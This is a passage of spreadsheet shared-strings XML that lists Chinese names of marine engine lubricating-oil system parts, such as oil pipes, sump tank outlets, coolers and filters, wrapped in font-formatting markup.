      <t>滑油底柜出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油底柜出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油底柜出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油底柜规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油底油柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>执行器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油阀座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油分离器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油分离装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油分配管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油分配块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管，轴向轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变速箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管出口，润滑设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管放大器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管分段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管管罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变速箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后部压力阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后部压力阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变速箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管节流器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管进口</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颈向轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口式密封环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气分配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变速箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭矩补偿器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尾端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
